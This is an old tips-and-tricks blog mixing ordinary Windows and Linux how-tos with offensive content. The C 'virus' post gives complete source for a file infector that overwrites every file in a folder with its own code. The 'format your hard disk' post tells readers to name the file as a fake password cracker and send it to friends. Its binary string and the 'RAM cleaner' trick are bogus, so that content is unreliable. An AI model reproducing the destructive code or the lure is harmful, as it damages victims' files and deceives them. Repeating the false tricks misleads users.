Saturday, 6 October 2012

How to safely uninstall Linux when Dual boot installed with Windows XP


How to safely uninstall Linux when Dual boot installed with Windows XP HAckZ ?
When asked to most of the users “How will you uninstall Linux when it is Dual Boot installed with Windows XP?” The common answers we got was “Start windows XP and format Linux Partition“. Well they were half correct, you do have to format the linux partition but what about the grub loader? The grub loader will still be showing you the option to boot Linux during the start up and by mistake if anybody goes for booting linux, the system will not find any linux on your machine and it will restart. so what can you do in this situation?
There is a simple procedure to uninstall or delete linux completely and safely by following a step by step procedure illustrated below and it is tested by me .
Requirements:
You need a windows xp,98 startup disk or windows 7 installation CD.

How to do it:

1. Reboot your laptop with windows xp,98 start up disc or Windows 7 CD and type the command “fixmbr”.
2. Above command will repair ur bootloader and rewrite ntldr which will replace grub loader of Linux and now you can see only Windows XP in the boot menu.
3. Now Boot up in Windows xp.
4. Go to Start > Control Panel > Administrative Tools > Computer Management
5. Go to Disk Management under “Storage”
6. Select your Hard Disk and then the linux partition.
7. Delete the linux partition this will delete linux and grub.
8. Thats it done now boot your laptop or desktop normally it will be booted by default in windows xp.

How to create a Virus code in “C” & “C++” to jam a system!!


This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them.  But the virus infected file is also capable of spreading the infection to another file and so on.

Don’t compile in ur own machine.
#include
#include
#include
#include
#include
#include
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(”*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULLgoto next;
x=89088;
printf(”Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(”DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(”TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}

Enjoy!  hehehehehe  :)

Friday, 5 October 2012

Hide and Unhide Folder Options Missing


Hide and Unhide Folder Options Missing
Computer tips and tricks as well as software, hardware, internet that help make you more productive and your overall computer experience a lot more enjoyable. Computer tips and tricks, tricks,computer tips, computer, tips, information, listing, tip, computer tip, about, windows, internet, internet, ticks, explorer, Microsoft


Open Run and then type "gpedit.msc".

Now goto User Configuration > Administrative templates > Windows Component > Windows Explorer.

Click on Windows Explorer you will find the 3rd option on the right side of screen "Removes the Folder Option menu item from the Tools menu"Just check it, if it is not configured then change it to enable by double clicking on it and after applying again set it to not configured.


Hide and Unhide Folder Options Missing

How to Create Your Own Customized Run Commands


This post will help you in creating your own customized Run command that you can use to initiate a variety of programs. The Run is a special in built utility that allows you to interact with the system through the command line. There are several in built commands to initiate a variety of programs like calc for Calculator, cmd for Command Prompt. So let’s start out and create our own command.

We will take an example in which we would create a run command to launch Google Chrome web browser. When you type in gc in the run command the New Google Chrome window should open.

a.  Create a shortcut of “Chrome” on the desktop and rename it as “gc”.

b.  Then copy this shortcut into your Windows directory


Computer tips and tricks as well as software, hardware, internet that help make you more productive and your overall computer experience a lot more enjoyable. Computer tips and tricks, tricks,computer tips, computer, tips, information, listing, tip, computer tip, about, windows, internet, internet, ticks, explorer, Microsoft



c.   That’s it! Simply run the Run utility and type in gc and hit enter to see the customized run command results


Computer tips and tricks as well as software, hardware, internet that help make you more productive and your overall computer experience a lot more enjoyable. Computer tips and tricks, tricks,computer tips, computer, tips, information, listing, tip, computer tip, about, windows, internet, internet, ticks, explorer, Microsoft

How to Create Your Own Customized Run Commands

HOW TO CLEAN YOUR RAM USING NOTEPAD





Many friends of me ask where can I download a software which can keep my RAM free? And I found these software are nothing but using some lines of code which can be implemented by using notepad or any editor tool. So if any one does not have any software, you can use it by doing the following things which I am going to mention.

Steps to Clean Your RAM Using Notepad:

Step 1: Open Notepad
Step 2: Type FreeMem=Space(10240000000)
Step 3: Save it as “CLEANER.VBS” in any location you like.
Step 4: You can edit the code and write 512 instead of 1024 if you own a 512mb RAM or change to anything you like.
Step 5: Run it !

Format Your Hard Disk Use Notepad


As you all know, Notepad is yet a basic text editor with which you can easily make simple documents or any kinda web pages. You can edit or create any files which need formatting and so for all that purpose you use Notepad. :)

Computer tips and tricks as well as software, hardware, internet that help make you more productive and your overall computer experience a lot more enjoyable. Computer tips and tricks, tricks,computer tips, computer, tips, information, listing, tip, computer tip, about, windows, internet, internet, ticks, explorer, Microsoft

Now First of all Head over to Notepad, for that follow: 

Start >> All Programs >> Accessories >> Notepad

Now I will show you how to make a simple script into a binary language which is then used to format your hard drive bu just running that particular file. 

Computer tips and tricks as well as software, hardware, internet that help make you more productive and your overall computer experience a lot more enjoyable. Computer tips and tricks, tricks,computer tips, computer, tips, information, listing, tip, computer tip, about, windows, internet, internet, ticks, explorer, Microsoft

First open notepad, as I have told above, and write the binary value given in the 

image below without our website link. 
Now as i told above, Open the Notepad and type in the following below code into it 

as shown in the screenshot without that link in it. 

01001011000111110010010101010101010000011111100000

Computer tips and tricks as well as software, hardware, internet that help make you more productive and your overall computer experience a lot more enjoyable. Computer tips and tricks, tricks,computer tips, computer, tips, information, listing, tip, computer tip, about, windows, internet, internet, ticks, explorer, Microsoft


Now You just have to save this file with an .exe extension with it for eg. (Facebook-Password-Breaker.exe) we have just taken an example as if you make this and email it to your friends or put it on facebook so when it is run by your friend, it will format their drive(C:/ drive of your hard drive.) and all data has then be lost. Please its our Humble request not to do this for anyone as god is there seeing everything you do so don't do this at all it is just for the knowledge purpose. Enjoy with us !! Like and Share this Post with your friends :)


Format Your Hard Disk Using Notepad

Change Windows Restriction for any Program


Computer tips and tricks as well as software, hardware, internet that help make you more productive and your overall computer experience a lot more enjoyable. Computer tips and tricks, tricks,computer tips, computer, tips, information, listing, tip, computer tip, about, windows, internet, internet, ticks, explorer, Microsoft


You can add and delete Windows features in this Key shown below. Zero is Off and the value 1 is On. Example: to Save Windows settings add or modify the value name NoSaveSettings to 0, if set to1 Windows will not save settings. And NoDeletePrinter set to 1 will prevent the user from deleting a printer.


The same key shows up at: 
HKEY_USERS\(yourprofilename)\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer so change it there also if you are using different profiles.
1.Open RegEdit

2.Go to 

HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Policies
3.Go to the Explorer Key (Additional keys that can be created under Policies are System, Explorer, Network and WinOldApp )

4.You can then add DWORD or binary values set to 1 in the appropriate keys for ON and 0 for off.

NoDeletePrinter - Disables Deletion of Printers 
NoAddPrinter - Disables Addition of Printers 
NoRun - Disables Run Command 
NoSetFolders - Removes Folders from Settings on Start Menu 
NoSetTaskbar - Removes Taskbar from Settings on Start Menu 
NoFind - Removes the Find Command 
NoDrives - Hides Drives in My Computers 
NoNetHood - Hides the Network Neighborhood 
NoDesktop - Hides all icons on the Desktop 
NoClose - Disables Shutdown 
NoSaveSettings - Don't save settings on exit 
DisableRegistryTools - Disable Registry Editing Tools 
NoRecentDocsMenu - Hides the Documents shortcut at the Start button
NoRecentDocsHistory- Clears history of Documents
NoFileMenu _ Hides the Files Menu in Explorer
NoActiveDesktop - No Active Desktop
NoActiveDesktopChanges- No changes allowed
NoInternetIcon - No Internet Explorer Icon on the Desktop
NoFavoritesMenu - Hides the Favorites menu
NoChangeStartMenu _ Disables changes to the Start Menu
NoFolderOptions _ Hides the Folder Options in the Explorer
ClearRecentDocsOnExit - Empty the recent Docs folder on reboot
NoLogoff - Hides the Log Off .... in the Start Menu.
And here are a few more you can play with
ShowInfoTip
NoTrayContextMenu
NoStartMenuSubFolders
NoWindowsUpdate
NoViewContextMenu
EnforceShellExtensionSecurity
LinkResolveIgnoreLinkInfo
NoDriveTypeAutoRun
NoStartBanner
NoSetActiveDesktop
EditLevel
NoNetConnectDisconnect
RestrictRun - Disables all exe programs except those listed in the RestrictRun subkey

This key has many other available keys, there is one to even hide the taskbar, one to hide the control panel and more. I'm not telling you how, as someone may want to play a trick on you. The policies key has a great deal of control over how and what program can run and how one can access what feature.
In the System key you can enter: 
NoDispCPL - Disable Display Control Panel 
NoDispBackgroundPage - Hide Background Page 
NoDispScrSavPage - Hide Screen Saver Page 
NoDispAppearancePage - Hide Appearance Page 
NoDispSettingsPage - Hide Settings Page 
NoSecCPL - Disable Password Control Panel 
NoPwdPage - Hide Password Change Page 
NoAdminPage - Hide Remote Administration Page 
NoProfilePage - Hide User Profiles Page 
NoDevMgrPage - Hide Device Manager Page 
NoConfigPage - Hide Hardware Profiles Page 
NoFileSysPage - Hide File System Button 
NoVirtMemPage - Hide Virtual Memory Button
In the Network key you can enter: 
NoNetSetup - Disable the Network Control Panel 
NoNetSetupIDPage - Hide Identification Page 
NoNetSetupSecurityPage - Hide Access Control Page 
NoFileSharingControl - Disable File Sharing Controls 
NoPrintSharing - Disable Print Sharing Controls
In the WinOldApp key you can enter: 
Disabled - Disable MS-DOS Prompt 
NoRealMode - Disables Single-Mode MS-DOS
To add or remove programs in the Registry
1.Open RegEdit
2.Go to the desired Key


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices

3. Add a new String Value and name it anything you like
4. For the value data, enter the path and executable for the program you want to run.
By adding the value to the HKEY_CURRENT_USER hive instead allows the program to start only when that user is logged on.
If you add the value to the RunOnce key the program will run once and be removed from the key by Windows.


Change Windows Restriction for any Program